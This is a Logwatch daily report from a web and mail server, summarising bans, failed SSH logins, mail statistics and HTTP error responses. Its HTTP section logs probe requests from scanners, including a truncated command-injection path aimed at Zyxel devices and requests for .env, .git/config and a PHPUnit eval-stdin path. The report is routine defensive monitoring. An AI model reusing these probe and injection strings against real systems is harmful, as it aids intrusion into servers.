################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Thu Feb 29 04:42:03 2024 Date Range Processed: yesterday ( 2024-Feb-28 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 11:10 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 5 sites probed the server 134.209.180.157 164.52.0.94 198.235.24.151 80.82.78.39 91.92.250.119 Requests with error response codes 400 Bad Request *: 8 Time(s) /: 7 Time(s) null: 5 Time(s) /.env: 2 Time(s) /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 2 Time(s) &\x81\x02\x96Q\x9D\xE73I\xFEZ\xD3\x88.\xF4 ... C0\xAD\xC0$\xC0: 1 Time(s) &\x9E5~\xD3\xF8\x16\x82\x98\x86\xEA\xE5: 1 Time(s) /admin/config.php: 1 Time(s) /manager/html: 1 Time(s) /manager/text/list: 1 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) I\xB9: 1 Time(s) Z_\xFD\xB2\x8D#5\x1A\x1E\xBAN6\x17\xDC\xFA ... C0\xAE\xC0+\xC0: 1 Time(s) [\xDF\x9E\x98]o\xAEX\x03<cP_\x98Ne\xDE\xEB ... C0\xAE\xC0+\xC0: 1 Time(s) \x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0 ... x09\xC0\x14\xC0: 1 Time(s) \x0B\x9Ae\xD5'\xEF\xDAy\xD5\xF3A\x027\x22\ ... C\x00<\x00/\x00: 1 Time(s) \x8F*\x16\xC7\x1D\xADo\xEA\xC9\x83f_\x03k\ ... AP\xCF\x03_\xC9: 1 Time(s) \xA8\xD2Z\xFB\xE6G\xB6\xF6\xE4\xBA}3\xD5?\ ... C0$\x13\x05\xC0: 1 Time(s) \xF7\xB1\xAEmT\xCA\xF0\xEF|Q\xA7\x1Aa\xB0o ... C\xE4\x1E0#\xC9: 1 Time(s) \xFBL6\xE3\xCD\xC7Y\xA0\x1E\xA18d*\x95\x14 ... C0\xAE\xC0+\xC0: 1 Time(s) eb\x97\x1F: 1 Time(s) h*\x08\xA3\x9D\xC7(_\x87X\xCF>\xF5=+:A\xC2 ... C\x00<\x00/\x00: 1 Time(s) mstshash=Administr: 1 Time(s) w\x90t\x93g\x95\xD7c2\x04\xCF\x02\xBBDt\x9 ... C0$\x13\x05\xC0: 1 Time(s) 500 Internal Server Error /: 29 Time(s) /app: 5 Time(s) /.env: 4 Time(s) /favicon.ico: 3 Time(s) /+CSCOE+/logon.html: 2 Time(s) /.git/config: 2 Time(s) /cgi-bin/login.cgi: 2 Time(s) /login.jsp: 2 Time(s) /logon.htm: 2 Time(s) /pages/createpage-entervariables.action: 2 Time(s) /robots.txt: 2 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /ReportServer: 1 Time(s) /actuator/gateway/routes: 1 Time(s) /admin/config.php: 1 Time(s) /app?service=page/PrinterList: 1 Time(s) /app?service=page/SetupCompleted: 1 Time(s) /confluence/pages/createpage-entervariable ... tion?SpaceKey=x: 1 Time(s) /confluence/pages/createpage-entervariables.action: 1 Time(s) /doc/index.html: 1 Time(s) /geoserver/web/: 1 Time(s) /manage/account/login: 1 Time(s) /pages/createpage-entervariables.action?SpaceKey=x: 1 Time(s) /pages/createpage.action?spaceKey=myproj: 1 Time(s) /pages/doenterpagevariables.action: 1 Time(s) /pages/templates2/viewpagetemplate.action: 1 Time(s) /sitemap.xml: 1 Time(s) /template/custom/content-editor: 1 Time(s) /templates/editor-preload-container: 1 Time(s) /users/user-dark-features: 1 Time(s) /webui/: 1 Time(s) /wiki/pages/createpage-entervariables.action: 1 Time(s) 502 Bad Gateway /-S9MXoBxT0OMhDssROVsEg/pdf: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (ns3132093.ip-51-77-116.eu): 10 Time(s) unknown (170.64.197.110): 8 Time(s) root (124.222.211.66): 7 Time(s) unknown (62.122.184.252): 7 Time(s) root (170.64.197.110): 6 Time(s) root (64.23.166.240): 6 Time(s) unknown (185.11.61.88): 6 Time(s) unknown (2.57.122.127): 6 Time(s) root (222.118.29.221): 5 Time(s) unknown (182.227.130.233): 5 Time(s) unknown (ns3132093.ip-51-77-116.eu): 5 Time(s) unknown (185.196.8.151): 4 Time(s) unknown (185.196.9.45): 3 Time(s) unknown (141.164.166.27): 2 Time(s) root (60.191.91.42): 1 Time(s) unknown (59.13.166.87): 1 Time(s) unknown (64.23.166.240): 1 Time(s) Invalid Users: Unknown Account: 52 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 3 Miscellaneous warnings 5.841K Bytes accepted 5,981 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 183 Connections 15 Connections lost (inbound) 183 Disconnections 1 Removed from queue 1 Sent via SMTP 1 SMTP dialog errors 3 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 1 Time(s) Failed logins from: 51.77.116.35 (ns3132093.ip-51-77-116.eu): 10 times 60.191.91.42: 1 time 64.23.166.240: 6 times 124.222.211.66: 7 times 170.64.197.110: 6 times 222.118.29.221: 6 times Illegal users from: 2001:470:1:fb5:246e:a984:7a55:704e: 1 time undef: 16 times 2.57.122.127: 6 times 51.77.116.35 (ns3132093.ip-51-77-116.eu): 5 times 59.13.166.87: 5 times 62.122.184.252: 7 times 64.23.166.240: 1 time 65.49.1.86 (scan-57g.shadowserver.org): 1 time 141.164.166.27: 2 times 170.64.197.110: 10 times 182.227.130.233: 5 times 185.11.61.88: 6 times 185.196.8.151: 4 times 185.196.9.45: 3 times **Unmatched Entries** Protocol major versions differ for 152.32.149.246: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Server : 1 time(s) Protocol major versions differ for 118.123.105.85: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop65192p1 394G 243G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################